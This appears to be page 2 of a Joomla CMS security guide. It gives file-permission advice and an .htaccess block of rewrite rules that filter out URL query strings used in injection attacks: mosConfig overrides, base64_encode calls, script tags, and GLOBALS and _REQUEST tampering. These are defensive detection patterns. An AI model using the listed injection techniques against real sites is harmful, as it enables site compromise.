| Article Index |
|---|
| Security guide for Joomla CMS |
| Page 2 |
| All Pages |
3. chmod'ed files and directories with too much rights
NEVER chmod 777! Usually as least rights as possible!
Folders 755
Files 644
config.php and index.php 444
Without writing rights no defacement, where your index files get replaced. Protect your administrator folder with htaccess, using a generator like this one
.
To prevent many code injection technices:
Put a .htaccess file with this content or append it to your current one:
## Can be commented out if causes errors
Options FollowSymLinks
#
# mod_rewrite in use
RewriteEngine On
########## Begin - Rewrite rules to block out some common exploits
#
# Block out any script trying to set a mosConfig value through the URL
RewriteCond %{QUERY_STRING} mosConfig_[a-zA-Z_]{1,21}(=|\%3D) [OR]
# Block out any script trying to base64_encode crap to send via URL
RewriteCond %{QUERY_STRING} base64_encode.*\(.*\) [OR]
# Block out any script that includes a <script> tag in URL
RewriteCond %{QUERY_STRING} (\<|%3C).*script.*(\>|%3E) [NC,OR]
# Block out any script trying to set a PHP GLOBALS variable via URL
# RewriteCond %{QUERY_STRING} GLOBALS(=|\[|\%[0-9A-Z]{0,2}) [OR]
# Block out any script trying to modify a _REQUEST variable via URL
RewriteCond %{QUERY_STRING} _REQUEST(=|\[|\%[0-9A-Z]{0,2}) [OR]
# Block out any script that tries to set CONFIG_EXT (com_extcal2 issue)
RewriteCond %{QUERY_STRING} CONFIG_EXT(\[|\%20|\%5B).*= [NC,OR]
# Block out any script that tries to set sbp or sb_authorname via URL (simpleboard)
RewriteCond %{QUERY_STRING} sbp(=|\%20|\%3D) [OR]
RewriteCond %{QUERY_STRING} sb_authorname(=|\%20|\%3D)
# Send all blocked request to homepage with 403 Forbidden error!
RewriteRule ^(.*)$ index.php [F,L]
#
########## End - Rewrite rules to block out some common exploits
See these threads discussing this issue:
Thread 1
Thread 2
{mos_sb_discuss:49}
